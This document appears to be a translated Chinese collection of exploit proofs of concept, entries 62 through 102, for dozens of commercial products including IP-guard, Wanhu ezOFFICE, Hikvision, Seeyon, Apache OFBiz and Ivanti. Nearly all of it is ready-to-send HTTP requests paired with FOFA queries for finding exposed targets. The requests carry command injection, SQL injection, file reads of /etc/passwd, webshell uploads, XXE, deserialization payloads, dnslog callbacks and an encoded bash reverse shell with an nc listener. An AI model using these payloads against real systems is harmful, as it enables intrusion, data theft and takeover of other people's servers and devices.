Content-Type: application/x-www-form-urlencoded

8uxssX66eqrqtKObcVa0kid98xa

62. IP-guard WebServer remote command execution
FOFA:"IP-guard" && icon_hash="2030860561"
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Then request:

GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x

63. IP-guard WebServer arbitrary file read
IP-guard < 4.82.0609.0
FOFA:icon_hash="2030860561"
POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A

64. Jiecheng (捷诚) management information system CWSFinanceCommon SQL injection
FOFA:body="/Scripts/EnjoyMsg.js"
POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
Host: 192.168.86.128:9001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Connection: close
Content-Length: 369
Accept: */*
Accept-Language: en
Content-Type: text/xml; charset=utf-8
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <GetOSpById xmlns="http://tempuri.org/">
      <sId>1';waitfor delay '0:0:5'--+</sId>
    </GetOSpById>
  </soap:Body>
</soap:Envelope>

65. Youkate Lian'aiyun (优卡特脸爱云) face-pass smart management platform 1.0.55.0.0.1 permission bypass
FOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"
A 200 response means the account test123456/123456 was created.
POST /SystemMng.ashx HTTP/1.1
Host:
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Accept-Language: en
Content-Length: 174

operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators

66. Wanhu (万户) ezOFFICE collaborative management platform SendFileCheckTemplateEdit SQL injection
FOFA:app="万户ezOFFICE协同管理平台"
GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Lines 42 and 43 of the response containing the string 6cfe798ba8e5b85feb50164c59f4bec9 confirm the vulnerability.

67. Wanhu (万户) ezOFFICE wpsservlet arbitrary file upload
FOFA:app="万户网络-ezOFFICE"
The newdocId and filename parameters give the name of the written file, dir gives the path it is written to, and fileType gives the file type.
POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Content-Length: 173
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Connection: close
Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp
DNT: 1
Upgrade-Insecure-Requests: 1

--ufuadpxathqvxfqnuyuqaozvseiueerp
Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"

<% out.print("sasdfghjkj");%>
--ufuadpxathqvxfqnuyuqaozvseiueerp--

The uploaded file is served at /defaultroot/platform/portal/layout/apoxkq.jsp

68. Wanhu (万户) ezOFFICE wf_printnum.jsp SQL injection
FOFA:app="万户ezOFFICE协同管理平台"
GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: {{host}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

69. Wanhu (万户) ezOFFICE contract_gd.jsp SQL injection
FOFA:app="万户ezOFFICE协同管理平台"
GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

70. Wanhu (万户) ezEIP success command execution
FOFA:app="万户网络-ezEIP"
POST /member/success.aspx HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=
Content-Type: application/x-www-form-urlencoded
TYPE: C
Content-Length: 16702

__VIEWSTATE=PAYLOAD

71. Bangyong (邦永) PM2 project management system Global_UserLogin.aspx SQL injection
FOFA:body="PM2项目管理系统BS版增强工具.zip"
GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1

72. Seeyon (致远) OA getAjaxDataServlet XXE
FOFA:app="致远互联-OA"
POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1
Host: 192.168.40.131:8099
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 583
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E

73. GeoServer wms remote code execution
FOFA:icon_hash="97540678"
POST /geoserver/wms HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Content-Length: 1981
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/xml
SL-CE-SUID: 3

PAYLOAD

74. Seeyon (致远) M3-server 6_1sp1 deserialization RCE
FOFA:title="M3-Server"
PAYLOAD

75. Telesquare TLR-2005Ksh router admin.cgi RCE
FOFA:app="TELESQUARE-TLR-2005KSH"
GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

GET /cgi-bin/test28256.txt HTTP/1.1
Host: x.x.x.x

76. Newcapec (新开普) mobile campus service management platform service.action remote command execution
FOFA:title="掌上校园服务管理平台"
POST /service_transport/service.action HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 211
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
Upgrade-Insecure-Requests: 1

{
  "command": "GetFZinfo",
  "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"
}

GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1
Host: x.x.x.x

77. F22 garment management software system UploadHandler.ashx arbitrary file upload
FOFA:body="F22WEB登陆"
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Connection: close
Content-Length: 433
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix

------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="folder"

/upload/udplog
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"
Content-Type: application/octet-stream

hello1234567
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Upload"

Submit Query
------------398jnjVTTlDVXHlE7yYnfwBoix--

78. pkpmbs construction project quality supervision system FileUpload.ashx file upload
FOFA:icon_hash="2001627082"
POST /Platform/System/FileUpload.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 336
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l

------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"
Content-Type: image/png

YsOxWxSvj1KyZow1PTsh98fdu6l
------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="target"

/Applications/SkillDevelopAndEHS/
------YsOxWxSvj1KyZow1PTsh98fdu6l--

GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1
Host: x.x.x.x

79. BYTEVALUE (百为) traffic-control router remote command execution
FOFA:BYTEVALUE 智能流控路由器
GET /goform/webRead/open/?path=|id HTTP/1.1
Host: IP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

80. Suda Tianyao (速达天耀) software DesignReportSave.jsp interface arbitrary file upload
FOFA:app="速达软件-公司产品"
POST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 27
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/octet-stream
Upgrade-Insecure-Requests: 1

<% out.print("oessqeonylzaf");%>

GET /xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

81. Uniview (宇视科技) video surveillance main-cgi password leak
FOFA:app="uniview-视频监控"
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

82. Sifudi (思福迪) LOGBASE operations security management system test_qrcode_b remote command execution
FOFA:app="思福迪-LOGBASE"
POST /bhost/test_qrcode_b HTTP/1.1
Host: BaseURL
User-Agent: Go-http-client/1.1
Content-Length: 23
Accept-Encoding: gzip
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: BaseURL

z1=1&z2="|id;"&z3=bhost

83. JeecgBoot testConnection remote command execution
FOFA:title=="JeecgBoot 企业级低代码平台"

POST /jmreport/testConnection HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 8881
Accept-Encoding: gzip
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"
Content-Type: application/json

PAYLOAD

84. Jeecg-Boot JimuReport queryFieldBySql template injection
FOFA:title=="JeecgBoot 企业级低代码平台"

POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: curl/7.88.1
Content-Length: 156
Accept: */*
Connection: close
Content-Type: application/json
Accept-Encoding: gzip

{
  "sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",
  "type": "0"
}

85. SysAid On-premise < 23.3.36 remote code execution
CVE-2023-47246
FOFA:body="sysaid-logo-dark-green.png"
The exploit request is shown below; it drops a Godzilla webshell.
POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/octet-stream
Accept-Encoding: gzip

PAYLOAD

Result URL: http://x.x.x.x/userfiles/index.jsp

86. Tosei (Japan) self-service laundry machine RCE
FOFA:body="tosei_login_check.php"
POST /cgi-bin/network_test.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Content-Length: 44
Accept: */*
Accept-Encoding: gzip
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

host=%0acat${IFS}/etc/passwd%0a&command=ping

87. Anheng (安恒) Mingyu security gateway aaa_local_web_preview file upload
FOFA:title="明御安全网关"
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1
Host: X.X.X.X
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 198
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd

--qqobiandqgawlxodfiisporjwravxtvd
Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"
Content-Type: text/plain

2ZqGNnsjzzU2GBBPyd8AIA7QlDq
--qqobiandqgawlxodfiisporjwravxtvd--

/jfhatuwe.php

88. Anheng (安恒) Mingyu security gateway aaa_portal_auth_config_reset remote command execution
FOFA:title="明御安全网关"
GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close

/astdfkhl.php

89. Seeyon (致远互联) FE collaborative office platform editflow_manager SQL injection
FOFA:title="FE协作办公平台" || body="li_plugins_download"
POST /sysform/003/editflow_manager.js%70 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 41
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

option=2&GUID=-1'+union+select+111*222--+

90. Hikvision (海康威视) IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
FOFA:icon_hash="-1830859634"
POST /php/ping.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Content-Length: 51
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest

jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig

91. Hikvision (海康威视) integrated security management platform orgManage/v1/orgs/download arbitrary file read
FOFA:title="综合安防管理平台"
GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

92. Hikvision (海康威视) operations management center session command execution
Fastjson command execution
hunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"
POST /center/api/session HTTP/1.1
Host:
Accept: application/json, text/plain, */*
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: application/json;charset=UTF-8
X-Language-Type: zh_CN
Testcmd: echo test
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 5778

PAYLOAD

93. Qi'anxin NetGod (奇安信网神) SecGate3600 firewall app_av_import_save arbitrary file upload
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=app_av_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
Content-Type: text/plain

wagletqrkwrddkthtulxsqrphulnknxa
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarykcbkgdfx--

GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

94. Qi-Anxin Wangshen (奇安信网神) SecGate3600 firewall obj_area_import_save arbitrary file upload
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=obj_area_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36

------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"
Content-Type: text/plain

pxplitttsrjnyoafavcajwkvhxindhmu
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarybqvzqvmt--


GET /attachements/cciytdzu.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36


95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
CVE-2023-49070
FOFA:app="Apache_OFBiz"
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

<?xml version="1.0"?>
<methodCall>
  <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>
  <params>
    <param>
      <value>
        <struct>
          <member>
            <name>test</name>
            <value>
              <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[base64 of the payload]</serializable>
            </value>
          </member>
        </struct>
      </value>
    </param>
  </params>
</methodCall>


Generate the payload with ysoserial:
java -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"


Replace the placeholder in the POC above with the generated payload:
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

PAYLOAD

96. Apache OFBiz 18.12.11 groovy remote code execution
FOFA:app="Apache_OFBiz"
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: localhost:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 55

groovyProgram=throw+new+Exception('id'.execute().text);


Reverse shell
Start a listener on Kali:
nc -lvp 7777

POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 71

groovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();

97. OneBlog v2.2.2 blog Shiro deserialization remote command execution
FOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"
GET /passport/login/ HTTP/1.1
Host: 192.168.40.130:8085
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close
Cookie: rememberMe=PAYLOAD
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"


98. SpiderFlow crawler platform remote command execution
CVE-2024-0195
FOFA:app="SpiderFlow"
POST /function/save HTTP/1.1
Host: 192.168.40.130:8088
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 121
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

id=1&name=cmd&parameter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B


99. Ncast (盈可视) HD smart recording system busiFacade RCE
CVE-2024-0305
FOFA:app="Ncast-产品" && title=="高清智能录播系统"
POST /classes/common/busiFacade.php HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 154
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D


100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
CVE-2024-0352
FOFA:icon_hash="874152924"
POST /api/file/formimage HTTP/1.1
Host: 192.168.40.130
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Content-Length: 201
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
Accept-Encoding: gzip

------WebKitFormBoundarygcflwtei
Content-Disposition: form-data; name="file";filename="IE4MGP.php"
Content-Type: application/x-php

2ayyhRXiAsKXL8olvF5s4qqyI2O
------WebKitFormBoundarygcflwtei--


101. Ivanti Policy Secure 22.6 command injection
CVE-2024-21887
FOFA:body="welcome.cgi?p=logo"
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept-Encoding: gzip


102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
CVE-2024-21893
FOFA:body="welcome.cgi?p=logo"
POST /dana-ws/saml20.ws HTTP/1.1
Host: x.x.x.x
